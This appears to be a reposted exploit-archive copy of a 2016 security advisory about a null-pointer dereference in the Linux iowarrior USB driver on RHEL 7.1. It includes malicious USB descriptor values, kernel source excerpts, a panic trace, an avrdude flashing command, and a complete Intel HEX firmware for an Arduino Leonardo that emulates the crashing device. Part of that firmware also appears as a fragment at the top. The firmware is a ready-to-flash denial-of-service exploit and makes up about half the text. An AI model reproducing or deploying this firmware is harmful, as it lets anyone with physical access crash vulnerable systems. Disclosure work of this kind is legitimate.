:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
:1012C000781F891F9A1FA11D680F791F8A1F911D02
:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:1014240000000040820500000001010203010902DE
:10143400270001010000FA0705810304040C0705D5
:10144400010204000C0705820104000C07000700D8
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF
HireHackking 
OS-S Security Advisory 2016-15
Linux iowarrior Nullpointer Dereference

Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (iowarrior driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the 
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net//advisories/OSS-2016-15_iowarrior.pdf

Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB 
device requiring the iowarrior driver.

Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo 
(github.com/schumilo) using the following device descriptor:

[*] Device-Descriptor
bLength:	0x12
bDescriptorType:	0x1
bcdUSB:	0x200
bDeviceClass:	0x3
bDeviceSubClass:	0x0
bDeviceProtocol:	0x0
bMaxPacketSize:	0x40
idVendor:	0x7c0
idProduct:	0x1500
bcdDevice:	0x100
iManufacturer:	0x1
iProduct:	0x2
iSerialNumbers:	0x3
bNumConfigurations:	0x1

This is the configuration descriptor containing the malicious value for 
bNumEndpoints causing the crash. A zero value for bNumEndpoints crashes the 
system.

[*] Configuration-Descriptor
bLength:	0x9
bDescriptorType:	0x2
wTotalLength:	0x27
bNumInterfaces:	0x1
bConfigurationValue:	0x1
iConfiguration:	0x0
bmAttributes:	0x0
bMaxPower:	0x31
[*] Interface-Descriptor
bLength:	0x9
bDescriptorType:	0x4
bInterfaceNumber:	0x0
bAlternateSetting:	0x0
bNumEndpoints:	0x0
bInterfaceClass:	0x0
bInterfaceSubClass:	0x0
bInterfaceProtocol:	0x0
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x81	
bmAttribut:	0x3	
wMaxPacketSize:	0x404
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x1	
bmAttribut:	0x2	
wMaxPacketSize:	0x4
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x82	
bmAttribut:	0x1
wMaxPacketSize:	0x4
bInterval:	0xc

The iowarrior driver assumes that there will be at least one IN-endpoint-
descriptor.
If the interface-descriptor contains a zero-value for bNumEndpoints or no IN-
endpoint-descriptor is provided, the driver tries to dereference a null-
pointer and the kernel crashes:

****
$ nm iowarrior.ko.debug | grep iowarrior_probe
00000000000012a0 t iowarrior_probe
$ addr2line -e iowarrior.ko.debug 0x13D4
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/include/uapi/linux/usb/ch9.h:605
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (includes/uapi/linux/usb/ch9.c)
...
603 static inline int usb_endpoint_maxp(const struct usb_endpoint_descriptor 
*epd) /* used by iowarrior_probe */
604 {
605 return __le16_to_cpu(epd->wMaxPacketSize); /* Possible Nullpointer 
Dereference */
606 }

...
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/misc/iowarrior.c)
...
790 /* set up the endpoint information */
791 for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) {
792 endpoint = &iface_desc->endpoint[i].desc;
793
794 if (usb_endpoint_is_int_in(endpoint))
795 dev->int_in_endpoint = endpoint; /* Nullpointer if never set */
796 if (usb_endpoint_is_int_out(endpoint))
797 /* this one will match for the IOWarrior56 only */
798 dev->int_out_endpoint = endpoint;
799 }
800 /* we have to check the report_size often, so remember it in the 
endianness suitable for our machine */
801 dev->report_size = usb_endpoint_maxp(dev->int_in_endpoint); /* Nullpointer 
if never set */
802 if ((dev->interface->cur_altsetting->desc.bInterfaceNumber == 0) &&
803 (dev->product_id == USB_DEVICE_ID_CODEMERCS_IOW56))
804 /* IOWarrior56 has wMaxPacketSize different from report size */
805 dev->report_size = 7;
...
****

Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This 
firmware will emulate the defective USB device.

avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U 
flash:w:binary.hex

The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to 
connect port D3 and 3V3!

Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, 
only physical access to the system is required.

Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this 
Security Advisory.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283390

Kernel Stacktrace:

[ 34.458988] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 34.662073] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint 
descriptors, different from the interface descriptor's value: 0
[ 34.694667] usb 1-1: New USB device found, idVendor=07c0, idProduct=1500
[ 34.701412] usb 1-1: New USB device strings: Mfr=1, Product=2, 
SerialNumber=3
[ 34.709475] usb 1-1: Product: Ä?
[ 34.713214] usb 1-1: Manufacturer: Ä?
[ 34.717062] usb 1-1: SerialNumber: %
[ 34.779320] BUG: unable to handle kernel NULL pointer dereference at 
0000000000000004
[ 34.780026] IP: [<ffffffffa03943d4>] iowarrior_probe+0x134/0x4a0 [iowarrior]
[ 34.780026] PGD 0 
[ 34.780026] Oops: 0000 [#1] SMP 
[ 34.780026] Modules linked in: iowarrior(+) ip6t_rpfilter ip6t_REJECT 
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc 
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter 
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat 
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter 
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper 
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c 
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix 
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 34.780026] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted 
3.10.0-229.14.1.el7.x86_64 #1
[ 34.780026] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 34.780026] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 34.780026] RIP: 0010:[<ffffffffa03943d4>] [<ffffffffa03943d4>] 
iowarrior_probe+0x134/0x4a0 [iowarrior]
[ 34.780026] RSP: 0018:ffff88000bd23b98 EFLAGS: 00010246
[ 34.780026] RAX: 0000000000000000 RBX: ffff88000bd36600 RCX: 0000000000000000
[ 34.780026] RDX: 0000000000000000 RSI: 0000000000001500 RDI: ffff88000bd36688
[ 34.780026] RBP: ffff88000bd23be0 R08: 0000000000016460 R09: ffff88000e401700
[ 34.780026] R10: ffffffffa03942d3 R11: ffffffff810020d8 R12: ffff88000c525800
[ 34.780026] R13: ffff88000bcd0090 R14: ffff88000bcd0000 R15: ffff88000f508bc8
[ 34.780026] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) 
knlGS:0000000000000000
[ 34.780026] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 34.780026] CR2: 0000000000000004 CR3: 000000000c448000 CR4: 
00000000000006f0
[ 34.780026] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
[ 34.780026] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 34.780026] Stack:
[ 34.780026] ffff88000c525830 ffff88000bd23be0 ffffffff813dfba2 ffff88000af01800
[ 34.780026] ffff88000bcd0090 ffff88000bcd0000 ffffffffa03960c8 ffff88000c525830
[ 34.780026] ffffffffa0395500 ffff88000bd23c28 ffffffff8141dc04 000000000bd23c00
[ 34.780026] Call Trace:
[ 34.780026] [<ffffffff813dfba2>] ? __pm_runtime_set_status+0x132/0x210
[ 34.780026] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 34.780026] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 34.780026] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 34.780026] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 34.780026] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 34.780026] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 34.780026] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 34.780026] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 34.780026] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 34.780026] [<ffffffffa0399000>] ? 0xffffffffa0398fff
[ 34.780026] [<ffffffffa039901e>] iowarrior_driver_init+0x1e/0x1000 [iowarrior]
[ 34.780026] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 34.780026] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 34.780026] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 34.780026] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 34.780026] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 34.780026] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 34.780026] Code: 0c c8 0f b6 41 03 83 e0 03 3c 03 75 da 80 79 02 00 0f 88 
10 02 00 00 48 89 4b 40 41 0f b6 47 04 83 c2 01 39 d0 7f cc 48 8b 43 48 <0f> 
b7 40 04 89 83 c8 00 00 00 49 8b 44 24 08 80 78 02 00 0f 84 
[ 34.780026] RIP [<ffffffffa03943d4>] iowarrior_probe+0x134/0x4a0 [iowarrior]
[ 34.780026] RSP <ffff88000bd23b98>
[ 34.780026] CR2: 0000000000000004
[ 35.199537] ---[ end trace b239663354a1c556 ]---
[ 35.205081] Kernel panic - not syncing: Fatal exception
[ 35.206054] drm_kms_helper: panic occurred, switching back to text console

Arduino Leonardo Firmware:

:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C2050C942D04CE
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940C02C3
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C50009030C0306
:1000B000FF0203032D032D032D0310031403180364
:1000C0001E0322032D0328030000000200080E0077
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E0EDF3E102C005900D92A436B107D5
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9402070C940000089547
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E949F020E94C70060E06D
:1001B00083E00E942E0361E087E00E942E0361E04D
:1001C00088E00E942E030E9457067E012AE9E20E73
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93F90168
:1002C0009082E4E0D9011196EC93F901DC01292D2B
:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB
:1002E0001B96FC93EE931A971D96BC92AE921C97A8
:1002F0001183008373836283558344830C521109F5
:100300002CE0F80111922A95E9F721E0D80119961D
:100310002C931997FE01E059FF4F01900D929A948A
:10032000E1F7F8019387828761E088E00E94670324
:100330008BE492E00E94630688E892E00E946306E4
:1003400087EC92E00E94630686E093E00E946306D9
:1003500082E493E00E9463068FE793E00E946306C5
:1003600084EA93E00E9463068BEE93E00E946306AA
:1003700083E00E949D03892B09F047C05E01F3E2F0
:10038000AF0EB11C8824839482E1982E84E194E01E
:100390000E946306BF92AF92DF92CF92FF92EF92DC
:1003A0001F928F921F930F932DB73EB722513109A1
:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6
:1003C000FE01FB96892D01900D928A95E1F78DE64D
:1003D00095E00E94010668E873E180E090E00E94E9
:1003E00079028DE695E00E944C0660E087E00E946D
:1003F000670368E873E180E090E00E9479020FB63D
:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0
:1004100090E00E947902ACCF1F920F920FB60F921C
:1004200011242F933F938F939F93AF93BF9380910A
:10043000650590916605A0916705B09168053091BA
:10044000640523E0230F2D3720F40196A11DB11D73
:1004500005C026E8230F0296A11DB11D2093640557
:100460008093650590936605A0936705B093680532
:100470008091690590916A05A0916B05B0916C051A
:100480000196A11DB11D8093690590936A05A09303
:100490006B05B0936C05BF91AF919F918F913F9188
:1004A0002F910F900FBE0F901F9018953FB7F894A3
:1004B0008091690590916A05A0916B05B0916C05DA
:1004C00026B5A89B05C02F3F19F00196A11DB11DAF
:1004D0003FBF6627782F892F9A2F620F711D811DCC
:1004E000911D42E0660F771F881F991F4A95D1F72B
:1004F0000895CF92DF92EF92FF92CF93DF936B013B
:100500007C010E945602EB01C114D104E104F10404
:1005100079F00E9456026C1B7D0B683E7340A0F37D
:1005200081E0C81AD108E108F108C851DC4FECCFCE
:10053000DF91CF91FF90EF90DF90CF900895789466
:1005400084B5826084BD84B5816084BD85B58260D8
:1005500085BD85B5816085BDEEE6F0E08081816076
:100560008083E1E8F0E01082808182608083808176
:1005700081608083E0E8F0E0808181608083E1E950
:10058000F0E0808182608083808181608083E0E907
:10059000F0E0808181608083E1ECF0E08081846024
:1005A0008083808182608083808181608083E3ECAE
:1005B000F0E0808181608083E0ECF0E08081826007
:1005C0008083E2ECF0E0808181608083EAE7F0E004
:1005D000808184608083808182608083808181606B
:1005E0008083808180688083089590E0FC0131974A
:1005F000EE30F10590F5EA5AFF4F0C94A90980916D
:1006000080008F7703C0809180008F7D8093800071
:10061000089584B58F7702C084B58F7D84BD089519
:10062000809190008F7707C0809190008F7D03C0EC
:1006300080919000877F8093900008958091C00002
:100640008F7703C08091C0008F7D8093C000089594
:100650008091C200877F8093C2000895CF93DF937B
:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A
:100670008491882349F190E0880F991FFC01E25C86
:10068000FE4FA591B491805D9E4FFC01C591D49120
:100690009FB7611108C0F8948C91209582238C93A8
:1006A000888182230AC0623051F4F8948C91322FF1
:1006B000309583238C938881822B888304C0F8949F
:1006C0008C91822B8C939FBFDF91CF9108950F93D4
:1006D0001F93CF93DF931F92CDB7DEB7282F30E063
:1006E000F901E853FF4F8491F901EA51FF4F14914A
:1006F000F901EC5FFE4F04910023C9F0882321F03B
:1007000069830E94F5026981E02FF0E0EE0FFF1F80
:10071000E05DFE4FA591B4919FB7F8948C91611163
:1007200003C01095812301C0812B8C939FBF0F9034
:10073000DF91CF911F910F910895CF93DF93282FD1
:1007400030E0F901E853FF4F8491F901EA51FF4F7E
:10075000D491F901EC5FFE4FC491CC2391F081114B
:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52
:10077000A591B4912C912D2381E090E021F480E0AB
:1007800002C080E090E0DF91CF910895615030F099
:100790002091F100FC0120830196F8CF289884E68F
:1007A00080937D0508951092E900109271051092D2
:1007B000700590936F0580936E050895FF920F93D7
:1007C0001F93CF93DF93F82E8B01EA01BA01C80182
:1007D0000E94A406F80120E030E08EEF2C173D07C0
:1007E00091F1F7FE02C0A49101C0A0816091700553
:1007F0007091710540916E0550916F0564177507F2
:10080000ACF49091E8009570E1F39091E80092FDCE
:100810001CC0A093F100A0917005B09171051196D4
:10082000AF73BB27AB2B11F48093E800A091700548
:10083000B09171051196B0937105A09370052F5F6B
:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1
:10085000CF911F910F91FF9008951F920F920FB6A5
:100860000F9211246F927F928F929F92AF92BF92BC
:10087000CF92DF92EF92FF920F931F932F933F93AC
:100880004F935F936F937F938F939F93AF93BF9398
:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1
:1008A000CDBF1092E9008091E80083FF46C168E067
:1008B000CE010A960E94C60382EF8093E8009A85D3
:1008C00097FF05C08091E80080FFFCCF03C08EEF4A
:1008D0008093E800892F807609F023C18B858111F0
:1008E00005C01092F1001092F10020C1282F2D7F39
:1008F000213009F41BC1853049F48091E80080FF64
:10090000FCCF8C8580688093E30010C1863009F0AD
:10091000E1C02D8508891989223009F0B3C0EC8423
:100920008E2D90E020917305309174058217930706
:100930000CF09FC00E94D3031F92EF928DE394E0CE
:100940009F938F930E9481068CE0E89E7001112492
:10095000E0917505F0917605EE0DFF1D89E0DE0151
:10096000119601900D928A95E1F7C8010E94D30378
:1009700049E050E0BE016F5F7F4F80E00E94DE03E0
:100980000F900F900F900F90C12CD12C612C712CD7
:1009900033E7A32E34E0B32E4AEA842E44E0942EAB
:1009A000E0917505F0917605EE0DFF1D818590E0D3
:1009B000681679060CF0BAC07F926F92BF92AF9220
